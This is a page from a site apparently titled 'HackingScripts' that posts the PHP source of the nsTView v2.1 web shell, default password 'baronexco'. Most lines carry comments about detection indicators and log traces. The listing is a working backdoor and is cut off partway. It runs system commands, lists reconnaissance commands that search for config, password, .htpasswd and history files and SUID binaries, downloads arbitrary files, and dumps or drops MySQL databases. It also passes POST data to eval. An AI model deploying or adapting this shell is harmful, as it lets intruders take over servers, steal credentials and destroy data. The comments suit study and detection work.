HackingScripts

Hack Scripts for everybody

Baronexco shell

11 Feb 2014

I don’t know what this script is called, but the default password seems to be ‘baronexco’, so that’s the name I’ve given it. (The source below identifies itself as “nsTView v2.1” in its page title and version variable.)

Baronexco Shell Source Code

   1 <?
     # Session is started up front; the login check further down keeps its
     # state in $_SESSION['nst'].
   2 @session_start();
     # 0 lifts PHP's execution-time limit for this request. The leading `@` on
     # these calls silences any warning they would raise.
   3 @set_time_limit(0);
     # Legacy magic-quotes API (removed in PHP 7.0); its presence dates the sample.
   4 @set_magic_quotes_runtime(0);
     # Report everything except notices.
   5 error_reporting(E_ALL & ~E_NOTICE);
   6 
   7 ###
   8 ####cfg
   9 ###
  10 ####
  11 # use password  true / false #
     # When true, the $create_password branch further down shows a login form
     # and stops unless the session already holds the password.
  12 $create_password = true;
     # Hard-coded shared secret and the script's only access control. The
     # default literal is a convenient static indicator when scanning a web
     # root, but the inline comment says it can be changed, so signatures
     # should not depend on this string alone.
  13 $password = "baronexco";    // default password for nstview, you can change it.
  14 
  15 # UNIX COMMANDS
  16 # description (nst) command
  17 # example: Shutdown (nst) shutdown -h now
  18 $fast_commands = "
  19 Show open ports (nst) netstat -an | grep LISTEN | grep tcp
  20 last root (nst) last root
  21 last (all users) (nst) last all
  22 Find all config.php in / (nst) find / -type f -name config.php
  23 Find all config.php in . (nst) find . -type f -name config.php
  24 Find all admin.php in / (nst) find / -type f -name admin.php
  25 Find all admin.php in . (nst) find . -type f -name admin.php
  26 Find all config.inc.php in / (nst) find / -type f -name config.inc.php
  27 Find all config.inc.php in . (nst) find . -type f -name config.inc.php
  28 Find all config.inc in / (nst) find / -type f -name config.inc
  29 Find all config.inc in . (nst) find . -type f -name config.inc
  30 Find all config.dat in / (nst) find / -type f -name config.dat
  31 Find all config.dat in . (nst) find . -type f -name config.dat
  32 Find all config* in / (nst) find / -type f -name config*
  33 Find all config* in . (nst) find . -type f -name config*
  34 Find all pass* in / (nst) find / -type f -name pass*
  35 Find all pass* in . (nst) find . -type f -name pass*
  36 Find all .bash_history in / (nst) find / -type f -name .bash_history
  37 Find all .bash_history in . (nst) find . -type f -name .bash_history
  38 Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
  39 Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
  40 Find all writable dirs/files in / (nst) find / -perm -2 -ls
  41 Find all writable dirs/files in . (nst) find . -perm -2 -ls
  42 Find all suid files in / (nst) find / -type f -perm -04000 -ls
  43 Find all suid files in . (nst) find . -type f -perm -04000 -ls
  44 Find all sgid files in / (nst) find / -type f -perm -02000 -ls
  45 Find all sgid files in . (nst) find . -type f -perm -02000 -ls
  46 Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
  47 Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
  48 OS Version? (nst) sysctl -a | grep version
  49 Kernel version? (nst) cat /proc/version
  50 cat syslog.conf (nst) cat /etc/syslog.conf
  51 Cat - Message of the day (nst) cat /etc/motd
  52 Cat hosts (nst) cat /etc/hosts
  53 Distrib name (nst) cat /etc/issue.net
  54 Distrib name (2) (nst) cat /etc/*-realise
  55 Display all process - wide output (nst) ps auxw
  56 Display all your process (nst) ps ux
  57 Interfaces (nst) ifconfig
  58 CPU? (nst) cat /proc/cpuinfo
  59 RAM (nst) free -m
  60 HDD space (nst) df -h
  61 List of Attributes (nst) lsattr -a
  62 Mount options (nst) cat /etc/fstab
  63 Is cURL installed? (nst) which curl
  64 Is wGET installed? (nst) which wget
  65 Is lynx installed? (nst) which lynx
  66 Is links installed? (nst) which links
  67 Is fetch installed? (nst) which fetch
  68 Is GET installed? (nst) which GET
  69 Is perl installed? (nst) which perl
  70 Where is apache (nst) whereis apache
  71 Where is perl (nst) whereis perl
  72 locate proftpd.conf (nst) locate proftpd.conf
  73 locate httpd.conf (nst) locate httpd.conf
  74 locate my.conf (nst) locate my.conf
  75 locate psybnc.conf (nst) locate psybnc.conf
  76 ";
  77 
  78 
  79 
  80 # WINDOWS COMMANDS
  81 # description (nst) command
  82 # example: Delete autoexec.bat (nst) del c:\autoexec.bat
  83 $fast_commands_win = "
  84 OS Version (nst) ver
  85 Tasklist  (nst) tasklist
  86 Attributes in . (nst) attrib
  87 Show open ports (nst) netstat -an
  88 ";
  89 
  90 
  91 
  92 
  93 
  94 
  95 ###
  96 ###
  97 ###ver
  98 ###
  99 ###
 100 $ver= "v2.1";
 101 
 102 ###
 103 ###
 104 ###
 105 ###
 106 ###
 107 ####
     # Login: the POSTed `pass` field is compared (==) with the configured
     # $password; on a match the submitted value itself is stored in
     # $_SESSION['nst']. In HTTP logs the login shows up as a POST to this
     # file whose body carries a `pass` field.
 108 $pass=$_POST['pass'];
 109 if($pass==$password){
 110 $_SESSION['nst']="$pass";
 111 }
     # $ip is the first non-empty of the Client-IP header, the X-Forwarded-For
     # header, then REMOTE_ADDR. Both headers are client-supplied, so this is
     # not a trustworthy source address; in this excerpt it is only displayed.
 112 if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
 113 else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
 114 else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
 115 else $ip = $_SERVER['REMOTE_ADDR'];
     # HTML-escaped before it is echoed into the page.
 116 $ip=htmlspecialchars($ip);
 117 
 118 if($create_password==true){
     # Gate: unless $_SESSION['nst'] equals $password, the login form below is
     # emitted and the script stops. Everything after this branch runs only
     # with a matching session (or when $create_password is false).
     # Response-side indicators for scanners and WAF rules: the <title> text,
     # the nst.void.ru link, and a bare POST form whose single password field
     # is named `pass`.
     # The page also echoes the request's Host header and resolves it with
     # gethostbyname().
 119 
 120 if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
 121 die("
 122 <title>nsTView $ver:: nst.void.ru</title>
 123 <center>
 124 <table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
 125 <font size=1 face=verdana><center>
 126 <b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
 127 </center>
 128 <form method=post>
 129 Password:<br>
 130 <input type=password name=pass size=30 tabindex=1>
 131 </form>
 132 <b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
 133 <b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
 134 <b>Your ip:</b> ".$ip."
 135 </td></tr></table>
 136 ");}
 137 
 138 }
 139 $d=$_GET['d'];
 140 
 141 function adds($editf){
     # Returns $editf passed through addslashes(). The magic-quotes check is
     # commented out, so the escaping is applied unconditionally.
 142 #if(get_magic_quotes_gpc()==0){
 143 $editf=addslashes($editf);
 144 #}
 145 return $editf;
 146 }
 147 function adds2($editf){
     # Returns $editf passed through addslashes() only when
     # get_magic_quotes_gpc() reports 0; otherwise the value is returned as is.
     # get_magic_quotes_gpc() is a legacy API (removed in PHP 8.0).
 148 if(get_magic_quotes_gpc()==0){
 149 $editf=addslashes($editf);
 150 }
 151 return $editf;
 152 }
 153 
 154 $f   = "nst_sql.txt";
     # $f is the fixed file name used for SQL dumps; $f_d is the directory for
     # it, taken straight from the query string.
 155 $f_d = $_GET['f_d'];
 156 
     # File download: `d` (read into $d earlier) and `download` are joined into
     # a path and streamed with readfile(); neither value is checked, so any
     # file readable by the web-server account can be retrieved. Requests that
     # carry `download=` together with `d=` are the access-log trace of this.
 157 if($_GET['download']){
 158 $download=$_GET['download'];
 159 header("Content-disposition: attachment; filename=\"$download\";");
 160 readfile("$d/$download");
 161 exit;}
 162 
 163 if($_GET['dump_download']){
     # Streams the dump file $f_d/$f (nst_sql.txt) as an attachment, then
     # deletes it when it is writable. For incident response: the dump may no
     # longer exist on disk, so `dump_download=` and `f_d=` in the access logs
     # are the evidence that a dump was taken and which directory held it.
 164 header("Content-disposition: attachment; filename=\"$f\";");
 165 header("Content-length: ".filesize($f_d."/".$f));
 166 header("Expires: 0");
 167 readfile($f_d."/".$f);
 168 if(is_writable($f_d."/".$f)){
 169 unlink($f_d."/".$f);
 170 }
 171 die;
 172 }
 173 
 174 
 175 $images=array(".gif",".jpg",".png",".bmp",".jpeg");
     # Environment setup: $whereme is the script's working directory, $d the
     # directory being browsed (query parameter `d`, defaulting to $whereme).
 176 $whereme=getcwd();
 177 @$d=@$_GET['d'];
     # Footer banner; the nst.void.ru link and "Network security team" text are
     # further static strings usable in file or response signatures.
 178 $copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
 179 $php_self=@$_SERVER['PHP_SELF'];
     # OS guess: a "/" in the working directory means "unix", otherwise "win".
     # eregi() is a legacy API (removed in PHP 7.0).
 180 if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
 181 if(!isset($d)){$d=$whereme;}
     # Backslashes are normalised to forward slashes.
 182 $d=str_replace("\\","/",$d);
     # p=info prints the full phpinfo() page and stops.
 183 if(@$_GET['p']=="info"){
 184 @phpinfo();
 185 exit;}
     # img=1 streams the file $d/$e with an image/gif content type, whatever
     # the file actually is; `d` and `e` are both request parameters.
 186 if(@$_GET['img']=="1"){
 187 @$e=$_GET['e'];
 188 header("Content-type: image/gif");
 189 readfile("$d/$e");
 190 }
     # getdb=1 turns the response into a download named nst-mysql-damp.htm;
     # that file name is another indicator to search proxy and download logs for.
 191 if(@$_GET['getdb']=="1"){
 192 header('Content-type: application/plain-text');
 193 header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
 194 }
 195 print "<title>nsT View $ver</title>
 196 <style>
 197 BODY, TD, TR {
 198 text-decoration: none;
 199 font-family: Verdana;
 200 font-size: 8pt;
 201 SCROLLBAR-FACE-COLOR: #363d4e;
 202 SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
 203 SCROLLBAR-SHADOW-COLOR: #363d4e;
 204 SCROLLBAR-ARROW-COLOR: #363d4e;
 205 SCROLLBAR-TRACK-COLOR: #91AAFF
 206 }
 207 input, textarea, select {
 208 font-family: Verdana;
 209 font-size: 10px;
 210 color: black;
 211 background-color: white;
 212 border: solid 1px;
 213 border-color: black
 214 }
 215 UNKNOWN {
 216 COLOR: #0006DE;
 217 TEXT-DECORATION: none
 218 }
 219 A:link {
 220 COLOR: #0006DE;
 221 TEXT-DECORATION: none
 222 }
 223 A:hover {
 224 COLOR: #FF0C0B;
 225 TEXT-DECORATION: none
 226 }
 227 A:active {
 228 COLOR: #0006DE;
 229 TEXT-DECORATION: none
 230 }
 231 A:visited {
 232 TEXT-DECORATION: none
 233 }
 234 </style>
 235 <script>
 236 function ShowOrHide(d1, d2) {
 237 if (d1 != '') DoDiv(d1);
 238 if (d2 != '') DoDiv(d2);}
 239 
 240 function DoDiv(id) {
 241 var item = null;
 242 if (document.getElementById) {
 243 item = document.getElementById(id);
 244 } else if (document.all){
 245 item = document.all[id];
 246 } else if (document.layers){
 247 item = document.layers[id];}
 248 if (!item) {}
 249 else if (item.style) {
 250 if (item.style.display == \"none\"){ item.style.display = \"\"; }
 251 else {item.style.display = \"none\"; }
 252 }else{ item.visibility = \"show\"; }}
 253 
 254 function cwd(text){
 255 document.sh311Form.sh3.value+=\" \"+ text;
 256 document.sh311Form.sh3.focus();
 257 }
 258 
 259 
 260 </script>
 261 ";
 262 print "<body vlink=#0006DE>
 263 <table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
 264 <tr><td><font face=wingdings size=2>0</font>";
 265 $expl=explode("/",$d);
 266 $coun=count($expl);
 267 if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
 268 else{
 269         echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
 270 for($i=1; $i<$coun; $i++){
 271         @$xx.=$expl[$i]."/";
 272 $sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
 273 $sls=str_replace("//","/",$sls);
 274 $sls=str_replace("/'></a>/","/'></a>",$sls);
 275 print $sls;
 276 }
 277 if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
 278 if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
 279 echo "</td></tr>";
 280 if($os=="unix"){ echo "
 281 <tr><td><b>id:</b> ".@exec('id')."</td></tr>
 282 <tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
 283 <tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
 284 [<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
 285 [<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
 286 [<a href='$php_self'>Home</a>]
 287 [<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
 288 [<a href='$php_self?d=$d&t=upload'>Upload</a>]
 289 [<a href='$php_self?t=tools'>Tools</a>]
 290 [<a href='$php_self?p=info'>PHPinfo</a>]
 291 [<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
 292 [<a href='$php_self?p=sql'>SQL</a>]
 293 [<a href='$php_self?p=selfremover'>Self Remover</a>]
 294 </td></tr>
 295 ";
 296 if($os=="win"){ echo "
 297 <tr><td bgcolor=white>
 298 <center><font face=wingdings size=2><</font>
 299 <a href='$php_self?d=a:/'>A</a>
 300 <a href='$php_self?d=b:/'>B</a>
 301 <a href='$php_self?d=c:/'>C</a>
 302 <a href='$php_self?d=d:/'>D</a>
 303 <a href='$php_self?d=e:/'>E</a>
 304 <a href='$php_self?d=f:/'>F</a>
 305 <a href='$php_self?d=g:/'>G</a>
 306 <a href='$php_self?d=h:/'>H</a>
 307 <a href='$php_self?d=i:/'>I</a>
 308 <a href='$php_self?d=j:/'>J</a>
 309 <a href='$php_self?d=k:/'>K</a>
 310 <a href='$php_self?d=l:/'>L</a>
 311 <a href='$php_self?d=m:/'>M</a>
 312 <a href='$php_self?d=n:/'>N</a>
 313 <a href='$php_self?d=o:/'>O</a>
 314 <a href='$php_self?d=p:/'>P</a>
 315 <a href='$php_self?d=q:/'>Q</a>
 316 <a href='$php_self?d=r:/'>R</a>
 317 <a href='$php_self?d=s:/'>S</a>
 318 <a href='$php_self?d=t:/'>T</a>
 319 <a href='$php_self?d=u:/'>U</a>
 320 <a href='$php_self?d=v:/'>V</a>
 321 <a href='$php_self?d=w:/'>W</a>
 322 <a href='$php_self?d=x:/'>X</a>
 323 <a href='$php_self?d=y:/'>Y</a>
 324 <a href='$php_self?d=z:/'>Z</a>
 325 </td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
 326 print "<tr><td>
 327 :: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
 328 <a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
 329 <a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
 330 if($os=="unix"){
 331 print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
 332 }
 333 print "</td></tr>";
 334 
 335 
 336 
 337 
 338 
 339 if($_GET['p']=="ftp"){
 340 print "<tr><td>";
 341 
 342 
 343 
 344 print "</td></tr></table>";
 345 print $copyr;
 346 exit;
 347 }
 348 
 349 
 350 
 351 
 352 
 353 
 354 
 355 
 356 
 357 
 358 if(@$_GET['p']=="sql"){
 359 print "<tr><td>";
 360 
 361 ####
 362 
 363 $f_d = $_GET['f_d'];
     # Dump directory defaults to "." when `f_d` is absent or empty.
 364 if(!isset($f_d)){$f_d=".";}
 365 if($f_d==""){$f_d=".";}
 366 
 367 $php_self=$_SERVER['PHP_SELF'];
 368 $delete_table=$_GET['delete_table'];
 369 $tbl=$_GET['tbl'];
 370 $from=$_GET['from'];
 371 $to=$_GET['to'];
     # Connection settings are read from POST and then immediately overwritten
     # from GET, so the query-string values are the ones used. Because the
     # database host, login and password travel in the URL, they are recorded
     # in web-server access logs: during incident response those logs show
     # which database accounts were used and need their credentials rotated.
 372 $adress=$_POST['adress'];
 373 $port=$_POST['port'];
 374 $login=$_POST['login'];
 375 $pass=$_POST['pass'];
 376 $adress=$_GET['adress'];
 377 $port=$_GET['port'];
 378 $login=$_GET['login'];
 379 $pass=$_GET['pass'];
 380 $conn=$_GET['conn'];
     # Defaults when a parameter is absent: localhost, root, empty password,
     # port 3306, and a 0..50 row window.
 381 if(!isset($adress)){$adress="localhost";}
 382 if(!isset($login)){$login="root";}
 383 if(!isset($pass)){$pass="";}
 384 if(!isset($port)){$port="3306";}
 385 if(!isset($from)){$from=0;}
 386 if(!isset($to)){$to=50;}
 387 
 388 
 389 ?>
 390 <style>
 391 table,td{
 392 color: black;
 393 font-face: verdana;
 394 font-size: 11px;
 395 
 396 }
 397 </style>
 398 <font color=black face=verdana size=1>
 399 <? if(!$conn){ ?>
 400 
 401 <!-- table 1 -->
 402 <table bgcolor=#D7FFA8>
 403 <tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
 404 <tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
 405 <tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
 406 <tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
 407 <tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
 408 </table>
 409 <!-- end of table 1 -->
 410 
 411 
 412 <?
 413 $conn=$_GET['conn'];
 414 $adress=$_GET['adress'];
 415 $port=$_GET['port'];
 416 $login=$_GET['login'];
 417 $pass=$_GET['pass'];
 418 if($conn){
 419 
 420 $serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
 421 if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
 422 print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
 423 print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
 424 print "<br><font color=red>[db]</font><Br>";
 425 print "<font color=white>";
 426 $res = mysql_list_dbs($serv);
 427 while ($str=mysql_fetch_row($res)){
 428 print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
 429 $tc++;
 430 }
 431 $baza=$_GET['baza'];
 432 $db=$_GET['db'];
 433 print "<font color=red>[Total db: $tc]</font><br>";
 434 if($baza){
 435 print "<div align=left><font color=green>db: [$db]</div></font><br>";
 436 $result=@mysql_list_tables($db);
 437 while($str=@mysql_fetch_array($result)){
 438 $c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
 439 $records=mysql_fetch_array($c);
 440 
 441 if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
 442 if($records[0]=="0"){
 443 print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
 444 }else{
 445 print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
 446 }
 447 mysql_free_result($c);
 448 $total_t++;
 449 }
 450 print "<br><B><font color=red>Total tables: $total_t</font></b>";
 451                                 print "<pre>";
 452 for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
 453                                 print "</pre>";
 454 } #end baza
 455 
 456 
 457 
 458 
 459 # delete table
     # Destructive SQL built by concatenating request parameters. The table
     # name arrives as `delete_table` in the query string, so access logs show
     # which tables were dropped and when.
 460 if(isset($delete_table)){
 461 mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
 462 mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
 463 print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
 464 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
 465 }
 466 # end of delete table
 467 
 468 # delete database
     # Drops the database named in the `delete_db` query parameter; this too is
     # visible in access logs.
 469 if(isset($_GET['delete_db'])){
 470 mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
 471 print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
 472 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
 473 }
 474 # end of delete database
 475 
 476 # delete row
     # The WHERE clause arrives base64-encoded in the POST body (`delete_row`),
     # so row deletions do not appear in ordinary access logs; only the table
     # name (`tbl`, query string) does. Database query or binary logs, if
     # enabled, are the place to reconstruct what was removed.
 477 if(isset($_POST['delete_row'])){
 478 $_POST['delete_row'] = base64_decode($_POST['delete_row']);
 479 mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
 480 $del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
 481 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 482 }
 483 # end of delete row
 484 
 485 
 486 $vn=$_GET['vn'];
 487 print "</td><td valign=top>";
 488 print "<font color=green>Database: $db => $vn</font>";
 489 
 490 # edit row
 491 if(isset($_POST['edit_row'])){
 492 $edit_row=base64_decode($_POST['edit_row']);
 493 
 494 $r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
 495 print "<br><br>
 496        <table border=0 cellpadding=1 cellspacing=1><tr>
 497        <td><b>Row</b></td><td><b>Value</b></td></tr>";
 498 print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
 499 print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
 500 print " <input type=radio name=upd value=update checked>Update<br>
 501         <input type=radio name=upd value=insert>Insert new<br><br>";
 502 
 503 
 504 $i=0;
 505 while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
 506 foreach($mn as $key =>$val){
 507 $type  = mysql_field_type($r_edit, $i);
 508 $len  = mysql_field_len($r_edit, $i);
 509 $del .= "`$key`='".adds($val)."' AND ";
 510 $c=strlen($val);
 511 $val=htmlspecialchars($val, ENT_NOQUOTES);
 512 $str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
 513 $buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
 514 $i++;
 515 }
 516 
 517 }
 518 $delstring=base64_encode($del);
 519 print "<input type=hidden name=delstring value=\"$delstring\">";
 520 print "$buff</table><br>";
 521 print "<br>";
 522 if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
 523 
 524 
 525 
 526 
 527 if($_POST['makeupdate']){
 528 if($_POST['upd']=='update'){
 529 preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
 530 $delstring=$_POST['delstring'];
 531 $delstring=base64_decode($delstring);
 532 $delstring = substr($delstring, 0, strlen($delstring)-5);
 533 
 534 for($i=0; $i<count($matches3[0]); $i++){
     # NOTE(review): eval() on text assembled from request data. The variable
     # name comes from the field names matched out of $buff and the value from
     # the POST body, escaped only by adds2(). For static detection, eval(
     # combined with $_POST in a single statement is a high-signal pattern.
 535 eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
     # The same name/value pairs are appended to the SET list of the UPDATE.
 536 $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
 537 }
 538 $total_str = substr_replace($total_str,"",-1);
 539 $up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
 540 $up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
 541 print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
 542 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 543 mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
 544 }#end of make update
 545 
 546 
 547 
 548 if($_POST['upd']=='insert'){
 549 preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
 550 $delstring=$_POST['delstring'];
 551 $delstring=base64_decode($delstring);
 552 $delstring = substr($delstring, 0, strlen($delstring)-5);
 553 
 554 for($i=0; $i<count($matches3[0]); $i++){
 555 eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
 556 $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
 557 }
 558 
 559 $total_str = ",,".$total_str;
 560 
 561 preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
 562 
 563 for($i=0; $i<count($matches4[1]); $i++){
 564         $matches4[1][0]=str_replace(",","",$matches4[1][0]);
 565         $total_m_i .= "`".$matches4[1][$i]."`,";
 566         $total_m_x .= "'".$matches4[2][$i]."',";
 567 }
 568 $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
 569 $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
 570 
 571 $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
 572 mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
 573 print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
 574 print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
 575 }#end of insert
 576 }#end of update
 577 }
 578 # end of edit row
 579 
 580 
 581 # insert new line
 582 if($_GET['ins_new_line']){
 583 $qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
 584 print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
 585 Insert new line in <b>$tbl</b> table</b><Br><br>";
 586 print "<table>";
 587 while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
 588 foreach ($new_line as $key =>$next) {
 589 $buff .= "$next ";
 590 }
 591 $expl=explode(" ",$buff);
 592 $buff2 .= $expl[0]." ";
 593 print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
 594 <td><textarea name='$expl[0]' cols=39 rows=5></textarea>
 595 </td></tr>";
 596 unset($buff);
 597 }
 598 print "</table>
 599 <center><input type=submit value=Insert name=mk_ins></form></center>";
 600 if($_POST['mk_ins']){
 601 preg_match_all("/(.*?)\s/i",$buff2,$matches3);
 602 for($i=0; $i<count($matches3[0]); $i++){
 603 eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
 604 $total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
 605 }
 606 
 607 $total_str = ",,".$total_str;
 608 preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
 609 
 610 for($i=0; $i<count($matches4[1]); $i++){
 611         $matches4[1][0]=str_replace(",","",$matches4[1][0]);
 612         $total_m_i .= "`".$matches4[1][$i]."`,";
 613         $total_m_x .= "'".$matches4[2][$i]."',";
 614 }
 615 $total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
 616 $total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
 617 
 618 $make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
 619 mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
